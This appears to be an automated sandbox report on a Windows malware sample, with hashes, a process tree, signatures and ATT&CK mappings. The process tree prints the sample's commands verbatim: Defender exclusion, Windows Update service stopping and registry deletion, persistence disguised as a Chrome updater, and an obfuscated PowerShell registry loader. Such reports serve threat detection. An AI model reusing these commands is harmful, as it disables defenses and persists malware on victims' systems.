Resubmissions

04-09-2023 00:32

230904-avy45scf7x 10

03-09-2023 22:32

230903-2f6n8acd91 10

Analysis

  • max time kernel
    73s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-09-2023 22:32

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Stops running service(s) 3 TTPs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
    "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1528
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3048
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:2204
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:2776
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:2128
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:2904
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:2444
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        3⤵
          PID:1396
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          3⤵
            PID:3656
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            3⤵
            • Modifies security service
            PID:2536
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            3⤵
              PID:4360
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
              3⤵
                PID:3536
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2268
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:660
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3380
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1248
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1072
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5076
            • C:\Windows\system32\dialer.exe
              C:\Windows\system32\dialer.exe
              2⤵
                PID:4104
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
                2⤵
                  PID:1088
                  • C:\Windows\system32\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                    3⤵
                      PID:1436
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                  1⤵
                    PID:4648
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                    1⤵
                      PID:2372
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      1⤵
                        PID:3216
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          2⤵
                            PID:3656
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                            2⤵
                              PID:4132
                            • C:\Windows\system32\cmd.exe
                              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                              2⤵
                                PID:4472
                              • C:\Windows\system32\cmd.exe
                                cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                2⤵
                                  PID:1708
                              • C:\Windows\System32\dllhost.exe
                                C:\Windows\System32\dllhost.exe /Processid:{36eb5d49-b5ac-44ec-a5be-54423b3a666d}
                                1⤵
                                  PID:1228
                                • C:\Windows\system32\WerFault.exe
                                  C:\Windows\system32\WerFault.exe -pss -s 500 -p 668 -ip 668
                                  1⤵
                                    PID:2452
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -pss -s 460 -p 612 -ip 612
                                    1⤵
                                      PID:4576
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 612 -s 744
                                      1⤵
                                      • Program crash
                                      PID:2732
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -pss -s 560 -p 1016 -ip 1016
                                      1⤵
                                        PID:2968
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 668 -s 3932
                                        1⤵
                                        • Program crash
                                        PID:4732
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 1016 -s 3584
                                        1⤵
                                        • Program crash
                                        PID:3092
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        1⤵
                                          PID:540

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v13

                                        Persistence

                                        Create or Modify System Process

                                        2
                                        T1543

                                        Windows Service

                                        2
                                        T1543.003

                                        Privilege Escalation

                                        Create or Modify System Process

                                        2
                                        T1543

                                        Windows Service

                                        2
                                        T1543.003

                                        Defense Evasion

                                        Modify Registry

                                        1
                                        T1112

                                        Impair Defenses

                                        1
                                        T1562

                                        Impact

                                        Service Stop

                                        1
                                        T1489

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Program Files\Google\Chrome\updater.exe
                                          Filesize

                                          2.8MB

                                          MD5

                                          eb27bb8cfa99d659e4fe023e9002ecd1

                                          SHA1

                                          c783400302fdfae0518269c5a5a8d4bad29f42a3

                                          SHA256

                                          9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                          SHA512

                                          ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                          Filesize

                                          2KB

                                          MD5

                                          d85ba6ff808d9e5444a4b369f5bc2730

                                          SHA1

                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                          SHA256

                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                          SHA512

                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                          Filesize

                                          944B

                                          MD5

                                          3a6bad9528f8e23fb5c77fbd81fa28e8

                                          SHA1

                                          f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                          SHA256

                                          986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                          SHA512

                                          846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                          Filesize

                                          1KB

                                          MD5

                                          a72ff985dfc4198d9482d28724978ca0

                                          SHA1

                                          289e6121dd606027239ef040d9162ec835c461bc

                                          SHA256

                                          e70e9fc4aa9203cbead5f7fd282aacdd88f318680ab71c63bcc9347a311f96b3

                                          SHA512

                                          f2d689f534a5ba0141396380f4eb99723647cf2a8a659506479a693a8fd1153395e419299caa34576dd89b841f7df0e224d2e8f37627da14fc11ab4d55604a9c

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfsnsgro.cfo.ps1
                                          Filesize

                                          60B

                                          MD5

                                          d17fe0a3f47be24a6453e9ef58c94641

                                          SHA1

                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                          SHA256

                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                          SHA512

                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        • memory/432-142-0x000001A20B9D0000-0x000001A20B9FA000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/432-143-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/448-132-0x000001B751EE0000-0x000001B751F0A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/448-134-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/448-137-0x000001B751EE0000-0x000001B751F0A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/612-119-0x00007FFF0254D000-0x00007FFF0254E000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/612-116-0x00000150707E0000-0x000001507080A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/612-113-0x00000150707B0000-0x00000150707D3000-memory.dmp
                                          Filesize

                                          140KB

                                        • memory/612-162-0x00000150707E0000-0x000001507080A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/668-118-0x000002CCFEE30000-0x000002CCFEE5A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/668-129-0x00007FFF0254D000-0x00007FFF0254E000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/668-120-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/668-122-0x000002CCFEE30000-0x000002CCFEE5A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/668-205-0x000002CCFEE30000-0x000002CCFEE5A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/936-135-0x00007FFF0254C000-0x00007FFF0254D000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/936-124-0x000001DE28900000-0x000001DE2892A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/936-131-0x000001DE28900000-0x000001DE2892A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/936-128-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1016-125-0x0000024AAF140000-0x0000024AAF16A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1016-133-0x0000024AAF140000-0x0000024AAF16A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1052-148-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1052-146-0x00000233356F0000-0x000002333571A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1052-153-0x00000233356F0000-0x000002333571A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1064-149-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1064-147-0x0000017A79940000-0x0000017A7996A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1064-155-0x0000017A79940000-0x0000017A7996A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1088-64-0x000002A4962F0000-0x000002A496300000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1088-81-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/1088-51-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/1088-52-0x000002A4962F0000-0x000002A496300000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1088-53-0x000002A4962F0000-0x000002A496300000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1092-154-0x0000022992B60000-0x0000022992B8A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1092-156-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1092-160-0x0000022992B60000-0x0000022992B8A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1200-200-0x0000015267740000-0x000001526776A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1200-172-0x00007FFEC2530000-0x00007FFEC2540000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1200-169-0x0000015267740000-0x000001526776A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1228-101-0x0000000140000000-0x0000000140042000-memory.dmp
                                          Filesize

                                          264KB

                                        • memory/1228-102-0x0000000140000000-0x0000000140042000-memory.dmp
                                          Filesize

                                          264KB

                                        • memory/1228-107-0x0000000140000000-0x0000000140042000-memory.dmp
                                          Filesize

                                          264KB

                                        • memory/1228-108-0x00007FFF01080000-0x00007FFF0113E000-memory.dmp
                                          Filesize

                                          760KB

                                        • memory/1228-104-0x00007FFF024B0000-0x00007FFF026A5000-memory.dmp
                                          Filesize

                                          2.0MB

                                        • memory/1228-110-0x0000000140000000-0x0000000140042000-memory.dmp
                                          Filesize

                                          264KB

                                        • memory/1228-100-0x0000000140000000-0x0000000140042000-memory.dmp
                                          Filesize

                                          264KB

                                        • memory/1340-230-0x000001F117B80000-0x000001F117BAA000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1360-236-0x000001F74F5B0000-0x000001F74F5DA000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1400-226-0x00000165037C0000-0x00000165037EA000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1488-212-0x000001A8C5460000-0x000001A8C548A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1528-6-0x0000021D42480000-0x0000021D424A2000-memory.dmp
                                          Filesize

                                          136KB

                                        • memory/1528-13-0x0000021D42520000-0x0000021D42530000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1528-14-0x0000021D42520000-0x0000021D42530000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1528-15-0x0000021D42520000-0x0000021D42530000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1528-12-0x0000021D42520000-0x0000021D42530000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/1528-11-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/1528-18-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/1552-219-0x0000017450860000-0x000001745088A000-memory.dmp
                                          Filesize

                                          168KB

                                        • memory/1976-0-0x00007FF7C3EC0000-0x00007FF7C4188000-memory.dmp
                                          Filesize

                                          2.8MB

                                        • memory/1976-39-0x00007FF7C3EC0000-0x00007FF7C4188000-memory.dmp
                                          Filesize

                                          2.8MB

                                        • memory/2268-36-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/2268-34-0x000001A7EE6F0000-0x000001A7EE700000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/2268-33-0x000001A7EE6F0000-0x000001A7EE700000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/2268-31-0x000001A7EE6F0000-0x000001A7EE700000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/2268-30-0x000001A7EE6F0000-0x000001A7EE700000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/2268-29-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/2372-99-0x00007FFF01080000-0x00007FFF0113E000-memory.dmp
                                          Filesize

                                          760KB

                                        • memory/2372-65-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/2372-66-0x0000021132E80000-0x0000021132E90000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/2372-98-0x00007FFF024B0000-0x00007FFF026A5000-memory.dmp
                                          Filesize

                                          2.0MB

                                        • memory/2372-67-0x0000021132E80000-0x0000021132E90000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/2372-109-0x00007FFEE3B50000-0x00007FFEE4611000-memory.dmp
                                          Filesize

                                          10.8MB

                                        • memory/2372-82-0x0000021132E80000-0x0000021132E90000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/3216-164-0x00007FF744760000-0x00007FF744A28000-memory.dmp
                                          Filesize

                                          2.8MB

                                        • memory/3216-126-0x00007FF744760000-0x00007FF744A28000-memory.dmp
                                          Filesize

                                          2.8MB

                                        • memory/4104-50-0x00007FF7C2070000-0x00007FF7C20C6000-memory.dmp
                                          Filesize

                                          344KB

                                        • memory/4648-79-0x0000000003EA0000-0x0000000003ED6000-memory.dmp
                                          Filesize

                                          216KB

                                        • memory/4648-78-0x0000000074640000-0x0000000074DF0000-memory.dmp
                                          Filesize

                                          7.7MB

                                        • memory/4648-159-0x0000000003F50000-0x0000000003F60000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/4648-168-0x0000000003F50000-0x0000000003F60000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/4648-157-0x0000000003F50000-0x0000000003F60000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/4648-103-0x0000000004FC0000-0x0000000004FDE000-memory.dmp
                                          Filesize

                                          120KB

                                        • memory/4648-80-0x0000000003F50000-0x0000000003F60000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/4648-150-0x0000000074640000-0x0000000074DF0000-memory.dmp
                                          Filesize

                                          7.7MB

                                        • memory/4648-93-0x0000000004E50000-0x0000000004EB6000-memory.dmp
                                          Filesize

                                          408KB

                                        • memory/4648-92-0x0000000004C30000-0x0000000004C96000-memory.dmp
                                          Filesize

                                          408KB

                                        • memory/4648-86-0x00000000044C0000-0x00000000044E2000-memory.dmp
                                          Filesize

                                          136KB

                                        • memory/4648-83-0x0000000003F50000-0x0000000003F60000-memory.dmp
                                          Filesize

                                          64KB

                                        • memory/4648-84-0x0000000004590000-0x0000000004BB8000-memory.dmp
                                          Filesize

                                          6.2MB